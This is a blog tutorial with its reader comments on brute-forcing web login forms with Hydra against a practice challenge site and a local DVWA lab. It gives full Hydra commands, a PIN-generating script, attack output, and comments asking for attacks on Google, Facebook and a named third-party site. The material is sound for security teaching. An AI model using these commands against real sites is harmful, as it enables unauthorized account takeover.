Tuesday, September 24, 2013

Brute forcing a website login form using Hydra | Video

I have a new video that can get you past much more complex login forms and is easier to use, https://www.youtube.com/watch?v=OXIjNfX7BW8




In this video I show how to bruteforce a website's login form using the automated program Hydra. The login form that is being attacked is attack.samsclass.info/brute.htm chalenge #4.

 I also propose a possible mitigation by having your login success page display a hidden div at the top of the page containing the text from the failed login page. The user wouldn't see this, and hopefully when Hydra is searching for the text to know if the login was successful, it will come across this first and think it was another failed login.

Here is the actual command I used in the video, note that the uName.txt and uPass.txt point to the files on my desktop:


hydra -L uName.txt -P uPass.txt attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"

Here is a quick Bash script to generate the 3 digit password:
#!/bin/bash
for i in 0 1 2 3 4 5 6 7 8 9
do
  for j in 0 1 2 3 4 5 6 7 8 9 
  do
     for k in 0 1 2 3 4 5 6 7 8 9   
     do
       echo $i$j$k
    done
  done
done
You can download the script here but you will most likely need to run `chmod +x NumberGen.sh` on the file so that it can be executed by typing './NumberGen.sh' if you want the output of this file to create a text file we use what is called a pipe `>` so the terminal syntax would be `./NumberGen.sh > newFileName.txt` Or you can just download the text file that has all 1000 numbers here.

Due to all the requests I get for a password list, I have included the 10,000 most common passwords people use. I just found the list online and I believe it is in order from most common to least.

If you like my videos, please subscribe to me on YouTube:
http://www.youtube.com/subscription_center?add_user=GarrettFogerlie

Follow me on Twitter, @gFogerlie and Google+ https://plus.google.com/+GarrettFogerlie

If you have a video request you can let me know in the comments here or on my channel:
https://www.youtube.com/user/GarrettFogerlie/discussion



19 comments:

  1. Hey Garrett, I saw the page http://attack.samsclass.info/samsgame1/level0.php. Was wondering how you brute force a password without a the need for username=^USER^?

    ReplyDelete
    Replies
    1. This comment has been removed by the author.

      Delete
    2. In my previous answer, change "http-form-post" to "http-post-form". This is the correct syntax, although I don't this hydra cares as I believe the http-form-post was the original way of doing it, since I see it referenced on old tutorials.

      I tested the standard 10,000 worst passwords with the string above, (changing the "-p password" to "-P passFile.txt") with no luck.

      Delete
    3. Hello, please your skype Garett Forgerlie

      Delete
    4. You may email me at garrett@azinstall.net however I will not help with anything illegal, so please don't ask.

      Delete
  2. hey, loved the tutorial. I was wondering if it was possible to whitelist a URI instead of blacklisting a string using hydra? For instance if you know a successful login redirects you to site.com/protected, is it possible to set up hydra so that when you get a 200 response from site.com/protected, it saves the login? thanks.

    ReplyDelete
    Replies
    1. My understanding is that Hydra will search the response from the server for whatever you're looking for. As per my example, if you know what a success should look like then you would change this: "/brute4.php:login=^USER^&pin=^PASS^:Denied"

      to this:
      "/brute4.php:login=^USER^&pin=^PASS^:S=successful"

      In your case, I would think this would work:
      "/brute4.php:login=^USER^&pin=^PASS^:S=site.com/protected"

      "The 'failure' or 'success' string does not have to be part of the HTML of the page. These strings could be information in the response headers, such as cookies being set, or locations of redirects. There are flexible options for dealing with pretty much any type of response, as long as it is repeatable, and there are distinct differences between success and failure." http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html

      Delete
    2. MAJOR THANKS!!!! YOU'RE AWESOME.

      Delete
  3. but i't not always the action="login.php" i men page php, i find a form submit their action to page html and i don't now what i do :/

    ReplyDelete
    Replies
    1. I'm not entirely sure what you mean, but if I understand correctly you have a login form and are unsure where it submits to? Lets say we are at a webpage, http://site.com/index.html and there is a login form.

      If you look at the html, you should see a < form ... > tag, if it says action="page.html" then the url you submit your login information to is http://site.com/page.html if there is no action="" in the form tag, then you submit your login information to the page you are on, http://site.com/index.html

      Hope this helps get you going, let me know if you have further questions.

      Delete
  4. I was studying using DVWA in metasploitable 2
    hydra -L user.txt -P Found.dic 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/#:username=^USER^&password=^PASS^&submit=Login:Username and/or password incorrect." -v

    i got almost 48 results and none are correct. Help pls

    ReplyDelete
    Replies
    1. I didn't have time to look into it, but on first glance I'd try changing, "Username and/or password incorrect." to "incorrect"

      Delete
    2. Tried using 'incorrect' before and once again now. But still the result is same. Whichever password file I use the first 48 passwords are accepted.

      Here is the output.
      PS: Deleted some VERBOSE output and passwords in between to reduce the comment length. Thank you.

      hydra -L user.txt -P Found.dic 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/#:username=^USER^&password=^PASS^&submit=Login:incorrect" -v
      Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

      Hydra (http://www.thc.org/thc-hydra) starting at 2014-07-17 10:27:20
      [DATA] 16 tasks, 1 server, 8811375 login tries (l:3/p:2937125), ~550710 tries per task
      [DATA] attacking service http-get-form on port 80
      [VERBOSE] Resolving addresses ... done
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [80][www-form] host: 192.168.56.101 login: admin password: !!!!!!
      [80][www-form] host: 192.168.56.101 login: admin password: !!!
      [80][www-form] host: 192.168.56.101 login: admin password: !!!$QWER
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [80][www-form] host: 192.168.56.101 login: root password: !!!
      [80][www-form] host: 192.168.56.101 login: root password: !!!!!!!!
      [80][www-form] host: 192.168.56.101 login: root password: !!!!@@@@
      [80][www-form] host: 192.168.56.101 login: root password: !!!!????
      [80][www-form] host: 192.168.56.101 login: root password: !!!""�
      [80][www-form] host: 192.168.56.101 login: root password: !!!!123
      [80][www-form] host: 192.168.56.101 login: root password: !!!!!!!!!!2345
      [80][www-form] host: 192.168.56.101 login: root password: !!!!!!\"
      [80][www-form] host: 192.168.56.101 login: root password: !!!$QWER
      [80][www-form] host: 192.168.56.101 login: administrator password: !
      [STATUS] attack finished for 192.168.56.101 (waiting for children to complete tests)
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [80][www-form] host: 192.168.56.101 login: administrator password: !!
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!!!
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!!!!!!!2345
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!!!!!
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!!2
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!!!\"
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!@@@@
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!lili!!!!
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!ralf!!!!
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!123
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!!????
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!""�
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!$QWER
      [80][www-form] host: 192.168.56.101 login: administrator password: !!!..11
      1 of 1 target successfully completed, 48 valid passwords found
      Hydra (http://www.thc.org/thc-hydra) finished at 2014-07-17 10:27:35

      Delete
    3. It looks like you are trying to submit to the wrong page. It looks like there must be some javascript that does the logging in, (that's what the '#' is.) Try this url instead: /dvwa/vulnerabilities/brute/index.php

      You can also disable javascript on your browser to see if things change. This should be the entire command:

      hydra -L user.txt -P Found.dic 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect." -v

      If that doesn't work, verify your Found.dic file is just a plain text file and maybe change the extension to txt. I doubt this would be an issue but who knows.

      Delete
    4. tried index.php and login.php tried different password files with txt extension. None works. Tried "incorrect" and "Username and/or password incorrect." Result are the same. Thank you.

      Delete
    5. Give the following a shot, I found it here: http://www.techgaun.com/2012/02/brute-force-vulnerability-damn.html

      hydra -L user.txt -P Found.dic 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/?username=^USER^&password=^PASS^&Login=Login:incorrect” -v

      If this doesn't work, I'll install DVWA and pay around with it tonight or tomorrow. Let me know what happens.

      Delete
    6. Tried it before itself. Tried it now again. Still the same. I believe we should use a ':' before username while using hydra, right? Without using the ':' i get an error message. Thank you.

      Delete
  5. can you use this for sites like google and facebook

    ReplyDelete
  6. hey hack a web for me
    www.mayoschoolonline.com/phpmyadmin

    ReplyDelete